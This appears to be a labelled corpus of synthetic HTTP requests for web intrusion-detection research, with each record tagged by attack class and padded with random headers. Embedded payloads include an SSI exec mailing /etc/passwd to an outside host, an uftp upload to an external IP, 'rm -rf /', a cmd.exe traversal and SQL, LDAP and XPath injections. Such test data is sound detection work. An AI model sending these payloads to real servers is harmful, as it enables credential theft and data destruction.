Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1253, x-mac-ce;q=0.5
Accept-Encoding: compress;q=0.5, identity;q=0.7
Accept-Language: xolgpqj-u, idnht-ii, rfavshn-e6uf9mp;q=0.9, neinor0r-wdtni;q=0.4, y-dbhBu
Cache-Control: min-fresh=84
Client-ip: 79.240.194.64
Cookie: 0O=pqotive;aebr=71343494;g931Ih=qtn;xaa=eh0baq2eadminmochago;etelehSre1y6Imy=wglocationr9mmpositione;nslemi2Ra9caLLs=71
Cookie2: $Version="9"
Date: Fri, 05 Sep 08 09:31:32 GMT
ETag: "o-Sve-wo4yNnUq.x7"
Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Fri, 30 May 08 15:08:07 GMT
If-Match: *
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 0
MIME-Version: 2.4
Pragma: rOn='tywwyea'
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Basic RThtbjpldDllZUl1aQ==
Range: 61230-1,22438-
Referer: /papnm/ndac/pi6do.txt
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.8 (compatible; Konqueror/9.7; Solaris; ue7mota7; vposdtis; vtOzma)
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7251x584
Via: 4.6 www.reectr.html:58555, 1.9 221.113.92.153, Us0hti/2.6 www.lws4rOA.jpeg
Transfer-Encoding: identity
Upgrade: uit4/0.5, toct/8.1, blgp/4.0
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 726601184
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45777
Start - Id: 40097
class: SSI
GET /RAwinntLU/asCmtmue/C1daccept/8@mg.wsNlGnetcat_JLS.htm?-pecholHfq=%3C%21--++%23exec++cmd%3D%22%2Fbin%2Fmail+++++seib.com++++%3C+++%2Fetc%2Fpasswd%22--%3E&tfafnecLhyeax=emfo&eecjhq7Ouu9=insert+elee%5C9Mlx&sts=10407845&xhotaartvYn=Sr%2FtqzR8&IXYOD3@K=65029&beudvs6n12loua4=81168&taes=2 HTTP/1.0
Host: www.LidDorc.net
Connection: keep-alive
Accept: video/*, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 157.57.193.69
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Fri, 22 Jan 10 07:34:01 CET
ETag: W/"ExncUi9MHAuYRF4WCv"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Tue, 26 Oct 04 21:55:25 GMT
If-Unmodified-Since: Mon, 08 Aug 05 08:30:00 GMT
If-Match: *
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: f39dwx ai6x4zin=bmpfer
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: /aevmR/oovow0.php
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Connection
User-Agent: Mozilla/9.3 (compatible; Konqueror/0.9; Mac OS X; 2dhi)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: gzip
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40097
Start - Id: 36772
class: OsCommanding
GET /rnsdzao/4683-bQKxfHS/rtordqenKse4bbieTayt/tjn9Iz/trpj/asJO.e6QPh.mspx?VsC7zX2=d8brTaat0ipy&smdhloat=atetx8av9h6o&0pgrrNuolrxw=3&a_iZF=800&KginVprocessing-instructiondWA=i%40&aneAilafc9i5c=38034&istechld=%27+++++%3Buftp+-g+++++%2Fhome%2Fsigeinriti%2Fteelli+120.63.160.196+%2Fte+%3B HTTP/1.1
Host: 100.23.242.166
Connection: SsdItmlu
Accept: video/mpeg, audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: axnog8-E, le-aa, oiDapo-grL2Rv;q=0.7, aw-MdrHoc, gh1ite-osr7tos;q=0.6
Cache-Control: only-if-cached
Client-ip: 177.87.216.64
Cookie: Isx=e(
Cookie2: $Version="4"
Date: Thu, 28 Feb 08 07:50:21 CET
ETag: "cVJDZYCIgSRT74iSj-"
Expect: eawot=sec7ek;bqrdn4n
From: hqdnlp@uehby4G.ch
If-Modified-Since: Fri, 29 Jun 07 15:30:04 UTC
If-Unmodified-Since: Wed, 29 Sep 04 18:08:16 CET
If-Match: "saQvoe@JegI55k.cM"
If-None-Match: "d5K1A-MUBJWdku8U"
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Digest response="eAcCed11F3755c174dd9353a700c5b0e"
Range: -0
Referer: /tdho/sosdsa.php3
TE: chunked,chunked
Trailer: If-None-Match
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 5.1; tx-sb; rv:9.5.1) Gecko/17748171
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/1.6 168.145.230.195, FTP/8.7 www.8l6iw.htm, 9.5 104.169.70.34
Transfer-Encoding: compress
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36772
Start - Id: 41382
class: SqlInjection
PUT /bocopyye1JIdq2VhtaccesZ5/fpd/nbEXIZg/q9XrbTZ/6L7Rnuo0n8Tx8_g/sweiYaVK7Rs/tb/4knuR2W.css? HTTP/1.1
Content-Length: 221
Content-Language: z,qcns
Content-Encoding: identity
Content-Location: http://www.mous15Ur.gov/ohNEx/acseybg/astcoiiz/ozde9/25twUd.sh
Content-MD5: Q2Rvc2VFaXpuNG11c2VKNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Thu, 15 Mar 07 04:03:16 GMT
Host: www.ozdrnh1As.gov
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: teeiRv-vt;q=0.3, 8veepB-ebiuTOdm;q=0.7, e-besmkRa;q=0.1, yn-en;q=0.1, b-toncu;q=0.8
Cache-Control: waT4b='zl'
Client-ip: 93.72.204.142
Cookie: ngtD=2YhR8R;esEeish=3c82I4.IL2iT;seaYhrMpzlna5r=3
Cookie2: $Version="30"
Date: Mon, 12 May 08 22:19:49 CET
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Thu, 11 Jun 09 07:57:07 UTC
If-Unmodified-Since: Fri, 01 Jun 07 09:54:29 CET
If-Match: "I7Wz--cPV01sT3@B"
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=ahIeaoa
Range: -49879
Referer: http://www.ea9efjre.cz/8icPqm8n/r8Dce/loSazt/eSzmioS/puae.fgf
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: erbs2gC62H (k_xxSLI)
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Pgw@.Zf=MzcxHsT4'  );     DELETE   FROM     users  WHERE  upper(username)  =    upper(   'admin&no5useasicn=2baanatSgtth&kesoe=shaihxe9&s1b=3oreaei&.NEC=txripje&rncveotursb9ae=riebefdMygc5nibh&1V4px=383102

End - Id: 41382
Start - Id: 39530
class: SSI
GET /ETkOftpYfWXJ/tc1Nm9fez5yemour/naroeTcwdm0brepeq/lExOFNXpp3l5Kxcdx/cb5TE16shutdownkjq2u/aqletftY6oqqe/u4/npi@S702/uER/ax3F-40H@zN.aspx? HTTP/1.0
Host: 162.26.17.164
Connection: Scgfptc
Accept: image/jpeg
Accept-Charset: iso-8859-3, iso-8859-8-i;q=0.0, windows-1255, cp-932, koi8-r;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Cookie: Inexyjr1ewnoPhk=eOQ@ZwnoA;nAxmaffrl7hssu=crt-ssami;snnraYhers=h2i7l;ee9e2aoc7e8o=<!-- #include     virtual="/var/log/httpd/access.log"-->;dpWDknn=1;tyunionF=trQXu2OWynsw
Cookie2: $Version="8"
Date: Fri, 14 Jul 06 02:00:37 CET
Expect: wRpruh
If-Modified-Since: Wed, 27 Dec 06 02:19:53 GMT
If-Unmodified-Since: Thu, 03 Jan 08 01:22:24 CET
If-Match: "@iB2z4sfLEfgGsit"
If-None-Match: "m@mlaKPAwhK7fqQ1k5"
Max-Forwards: 91
Pragma: yAesyt='noabiu'
Referer: /sevEuar/yhzh9/nfeuaatt/roaT/nsvge.pl
TE: deflate,deflate;q=0.2,chunked
Trailer: If-Range
User-Agent: 4tczaewo
UA-Pixels: 939x764
Via: 7.0 www.rnatau.html:6372, Lrzuo/0.5 www.efshx.jpeg, 0.5 www.nm0noban.gif
Transfer-Encoding: deflate
----: ----------------------

null

End - Id: 39530
Start - Id: 45161
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: 189.119.2.232
Connection: ede5eNei
Accept: video/*
Accept-Charset: iso-8859-5;q=0.3, iso-10646-ucs-2, iso-8859-8-i;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: D44lhwr='cm'
Client-ip: 168.50.166.68
Cookie: cha=yI@5;iddR=ui
Cookie2: $Version="70"
Date: Mon, 01 Dec 08 20:19:10 UTC
ETag: W/"fJzIz8jtWw2VDvgEB"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Fri, 06 Oct 06 19:59:12 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "6YSxMwE7H-dkkCMZ8"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 372
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: /r40D.conf
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/0.6 (Windows; U; Win98 7.4; yd-fi; rv:1.9.1) Gecko/58713413
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45161
Start - Id: 35732
class: XPathInjection
GET /aNozX@eNxGzTck1mJ/SyuYa/Qxj_bbbb32/Rg2jpweblge.gif?timedtts=ajVGJTyVo&tgxv7riuesrye=gtZsock_stream&Oga=db%27%5D+++%7C++++P+++%7C+++%2F%2Fuser%5B++++name%2Ftext%28+++%29++%3D%27en HTTP/1.1
Host: www.sree.ch
Connection: olkfde
Accept: audio/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9504
Client-ip: 55.42.106.115
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="6"
Date: Tue, 01 Sep 09 19:18:20 UTC
ETag: "@h5CKoF7ijyntN2r"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Thu, 17 Feb 05 03:50:18 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 6
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest nonce
Range: 820401-
Referer: /wdeirt/teoy.txt
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: e52alLN (cO3@YZ; yDCixZ; 3vdIvWT1ec; eeeYsoBD)
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: nheut/5.6 www.koiaIej.png, 9.7 www.rs08gan.tiff, 5.5 156.74.254.199
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 631 www.2JzhBrtu.css "hyeinestem" "Mon, 15 Jan 07 05:21:32 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35732
Start - Id: 44917
class: PathTransversal
GET /nzr/olpsXLbWuK.luWPQ18/k7hsFtsybdW/sstedageepPajsu/PA51FhPKHVn-F/csz6ege8knnbyeiodh/vdO@diADlOfC9uWu32gw/tithtipstabm3.gif?meta13X5xLdaJvars=6629365&lha=ed2Cr&led5Raemo=7&jsu1ape14s=file%3A%2F%2F%2Ft%3A%2F9hoeu%2F7tbt%2Fthltroay.xml&KGV0M3=7acna&b4=cos&bcse2tc7su0=ctdg&7tuo=eqehy&jipdsuiaieBsadh=3&mt=8&xdreplace04zQmzdrop=symvauotrt&oao=127413&6oS6ouieiDmAoya=n%3Der&rlaNoey=30 HTTP/1.1
Host: www.qNYg6.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-ce;q=0.4, x-mac-ce, iso-8859-3
Accept-Encoding: *
Accept-Language: ixdlacm-Ieresa67
Cache-Control: only-if-cached
Client-ip: 117.77.195.37
Cookie: HkncoTaynpt=Dphps;y7X3RxtermBm7QZ=5;iaceerNasovac=nodpsfnooe
Cookie2: $Version="12"
Date: Tue, 02 Oct 07 20:41:36 CET
ETag: W/"i1-ktEh-Ty9r_0PkCH"
Expect: mai9
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Thu, 11 May 06 14:46:10 CET
If-Unmodified-Since: Thu, 03 Jun 04 13:05:45 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 09:38:13 CET
Max-Forwards: 1
MIME-Version: 8.3
Pragma: toys='srmoNJco'
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: c1Da srtarpts=Atit
Range: 50635-77
Referer: /yiij/fy8y.tiff
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 3.9; ys-cs; rv:9.3.5) Gecko/34420926
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 032 55.207.108.190 "nsyft" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44917
Start - Id: 38822
class: LdapInjection
GET /wors/gemcUlecewuanfrt/eoiwhfi018Oseeote6/u-6s.shtml?spneetOusyoe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&awvSg=5eri5wboot.inivbscript9t&izKSphp0T=ielpa2rtihitee&epfdleKp=h&4woloneeS=miface7df%5Cmh1%40sieo4&mlpns3ht=71&xp_20NPQIYgeu=925527&fehpnwT0mso=r%24sP0u8 HTTP/1.1
Host: 186.37.50.153
Connection: keep-alive
Accept: audio/*;q=0.2, video/quicktime, application/rtf;q=0.2
Accept-Charset: x-mac-turkish, windows-1252;q=0.9, x-mac-japanese, iso-8859-6;q=0.9
Accept-Encoding: compress;q=0.9, deflate;q=0.9, identity;q=0.3, gzip;q=0.3
Accept-Language: teterl-elivunt, 8veZtsh-ou;q=0.5, ii3cfHni-hsar1Aj;q=0.3
Cache-Control: max-stale=5
Client-ip: 166.96.232.49
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="4"
Date: Tue, 08 Feb 05 16:23:04 UTC
ETag: "cFY6YafTK7wsO_G-E90N"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Sat, 21 Oct 06 04:21:44 CET
If-Unmodified-Since: Sat, 15 Dec 07 06:25:36 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 38
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest algorithm=MD5
Range: 55524-
Referer: http://www.aaEeoR.fr/paUea30/6tmrt.avi
TE: trailers,trailers
Trailer: Via
User-Agent: uyceheEnnUwyezi
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: deflate
Upgrade: besedv/1.0
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38822
Start - Id: 39253
class: SSI
GET /r91VcZR@/vTaaiiiessuEbn91ion/2zUF-JoB0d/ebN7G6v/window.openf.updatesock_streamid7nXMoAs/Z0Rbqi8RTPvbscriptioLM.jpg?om=6398521&ieatuti=e9l0rs&Z1kjM=%3C%21--%23email+fromhost%3D%22www.liecsae.com%22+tohost%3D%22mailbox.5eh.com%22+message%3D%22rnElg+liligr+Ma8E+yscu%22+fromaddress%3D%22ha7oje.com%22+toaddress%3D%22rmto.kra.com%22+subject%3D%22erl%22+sender%3D%22m4ts.com%22+replyto%3D%22prtOrb.com%22+cc%3D%22fei%22+inreplyto%3D%22cqrjd+Irro+z%22+id%3D%22aedhhmail%22+--%3E&iNHF=rstylev%28&zlzI1nHz=eanenvl&tEjt5Iu6srmerl=ouThwOnjritn&aAsoe6eek4i=ooau&gMform28KL3re2=iinbcrcrelgRE&tna=4977897&2i2Bnduhaouef=o7nz&Ff=zcrze&berwt8=lh7nlia HTTP/1.1
Host: 209.102.187.30
Connection: fdmee
Accept: audio/*;q=0.6
Accept-Charset: x-mac-icelandic, iso-8859-6
Accept-Encoding: compress, deflate, deflate, compress, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 213.207.160.227
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Thu, 28 Jul 05 03:53:37 UTC
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Tue, 03 Mar 09 12:08:46 UTC
If-Match: "w.KFsA6SgDKlTnUM"
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 964
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM dGYyZG94dGU5dDFKYXNlaWExZ2ppZW9wY3JhYWVhN3Q=
Range: 5-9725,-6683
Referer: http://fohi.be/hButwy/t8lNv/icr6pt/isOtn.jpg
TE: deflate,deflate;q=0.0,trailers
Trailer: If-Range
User-Agent: nplSetAeheaduSjitnry
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: 2.1 180.85.21.169:6201, muS/6.2 81.171.164.216, 9.0 33.250.160.162
Transfer-Encoding: deflate
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39253
Start - Id: 44201
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 12.231.214.127
Connection: close
Accept: audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hhae45-etio0;q=0.0, Oxusx-alm;q=0.0, dgdHno-tEfod;q=0.7
Cache-Control: no-transform
Client-ip: 56.183.96.43
Cookie: iWchlddpne7sn=mvod8vnwee;r@eVYwinnt%uiE=52358
Cookie2: $Version="1"
Date: Mon, 10 Jan 05 15:19:34 GMT
ETag: "GJ.WMW9KP4T-6JR1LW"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Mon, 24 Jul 06 13:35:12 CET
If-Unmodified-Since: Sat, 04 Mar 06 13:12:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Apr 10 04:27:39 CET
Max-Forwards: 8
MIME-Version: 1.5
Pragma: n='kusw'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: deDe noqS=nc7seio
Range: 22399-
Referer: /unnEb7m/edlUtr7/hepg/Herfof.fgf
TE: chunked,trailers
Trailer: Referer
User-Agent: 271.Hf http://www.lrKctth.st
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: compress
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44201
Start - Id: 41764
class: SqlInjection
GET /m7r7jh4rtjnfr0h3a/eyA_CthVRS/ctaaobooe6gy/0JWzlG9I_.bin?oHZihu=apixknb%7Cyte88e&oQtd5si=b+%2F&tzcirNaCenr=h3e5lBTBar1&zM9WKdEUG=25405&adieyoovhnyc6i=trEtib&7tdzr3twknuo=Tarns%27%29%3B+++++DELETE++++FROM+++++users+++++WHERE+++++upper%28username%29+%3D++upper%28++++%27admin&ne3adu6stetLnhu=ddtN1wdujiu&4nEe=v%24torcpt8s HTTP/1.0
Host: www.toyrDeio.it:80
Connection: keep-alive
Accept: text/*;q=0.8, text/html, video/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: min-fresh=26
Client-ip: 34.136.27.140
Cookie: .Xi-qHVi8=31;erla=4874;ndgslocoia=g9ts;aeft2i0=access_log\ ;a4pnasw5e=lelike
Cookie2: $Version="0"
Date: Sat, 14 Jul 07 02:29:31 GMT
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: niInmY@ensa.be
If-Modified-Since: Mon, 26 Jan 04 07:28:11 GMT
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: "92z8xHer8Z3P36eMQL.a"
If-Range: *
Max-Forwards: 7009
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bnR0b1I2ZWVzdGlybmVJaG5lOG1lbm43YmV0dGFmbW4yZXdlTg==
Authorization: NTLM b2VsZGVhdE44aWU1NHlzZXJhdGJpZXJpUmJDbjJlbmV3eU5iYXZucGlD
Range: 4234-490888,-164882
Referer: /lnsoo/epUNtp.dll
TE: gzip;q=0.9
Trailer: Upgrade
User-Agent: asmdj/0.0.0.0.7
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 391x8982
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: hyt/2.3, usSsro/3.3, qhndkt/3.2, ay8/2.2
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41764
Start - Id: 42717
class: SqlInjection
PUT /7vH5FUR.html? HTTP/1.1
Content-Length: 57
Content-Language: f,6k,tt
Content-Encoding: identity
Content-Location: http://www.ooupi.be/0cpru0e/uog3d/odnhO9/dtinWnk/MNelue.asmx
Content-MD5: ZXJidG9hckVocnJkbnJoOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 04 10:18:27 GMT
Last-Modified: Wed, 22 Mar 06 17:50:51 CET
Host: www.femissB.com:13
Connection: erse0
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, windows-1255, x-mac-korean, iso-2022-jp;q=0.9
Accept-Encoding: gzip, gzip;q=0.0, compress, gzip, compress;q=0.5
Accept-Language: asertyen-arsaldrM;q=0.5, c7-uyteumem, cfgehn-tjetew;q=0.9, ltcai-sg0arf, ece9s-sodu
Cache-Control: no-store
Client-ip: 163.57.107.73
Cookie: rlSohdaUoruOo=yN
Cookie2: $Version="6"
Date: Sun, 11 Jan 09 08:09:05 GMT
ETag: "IBzhLnX6odwA8It@0R"
Expect: 5tyeuid
From: eieei@e8Bn78.net
If-Modified-Since: Tue, 06 Dec 05 19:37:24 GMT
If-Unmodified-Since: Mon, 06 Mar 06 01:49:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4806
MIME-Version: 9.7
Pragma: eoAvrre='0mnsEdni'
Authorization: Digest realm
Range: 178852-558277,2-2372,-0020
Referer: http://xIdaeo.cz/lorteso/oTrf/uLnbz.exe
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ' )   UNION  ALL  SELECT     id     ,   ietee9ty ,    eAynHhm3  FROM    yulusb     WHERE  ergevw   NOT     IN     (    'rtrsisjyre'  ) AND   tn    NOT  IN ( 'at4itb'   )   AND  ''=  '
UA-Disp: 966,2764,32
UA-Color: color16
UA-Pixels: 123x436
Via: FTP/1.0 www.al7ncE.tiff, r5o/0.5 146.29.233.201:38, er5Hn/2.1 177.83.221.7
Transfer-Encoding: gzip
Warning: 248 64.93.227.168:634 "DanimetRfrErrctntc" 
X-Serial-Number: 31876776688565711
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Acj0.=Hts&rllae3adt1lr=367&oeJRhta7m43=1&aaziltocrreld8=u

End - Id: 42717
Start - Id: 43554
class: OsCommanding
GET /oAo/sew9T.css?9krocmanmmlo=e3muatw1ctd&A9jadflroealE=%60+rm++++-rf++%2F%60 HTTP/1.1
Host: www.trozmir.st
Connection: close
Accept: video/quicktime, audio/*
Accept-Charset: x-mac-ce, isiri-3342, koi8-r, iso-2022-jp;q=0.5, x-mac-greek;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: ro2a05tejMk=iR;we2=ya0enAef7awsfSe;me=a1EmNmeestaaS;nn0=33347;dVnEvH54NI8=eoaoeAtsideolmee
Cookie2: $Version="85"
Date: Thu, 23 Feb 06 22:05:13 GMT
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Sat, 15 Apr 06 20:11:34 UTC
If-Unmodified-Since: Sun, 20 Apr 08 06:36:28 GMT
If-Match: *
If-None-Match: "0o@td3910LiAdDqVZWwA"
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 29
MIME-Version: 7.0
Pragma: bde=ne3tea8
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: Digest username="eup1n"
Range: 510-
Referer: /E72n.cfm
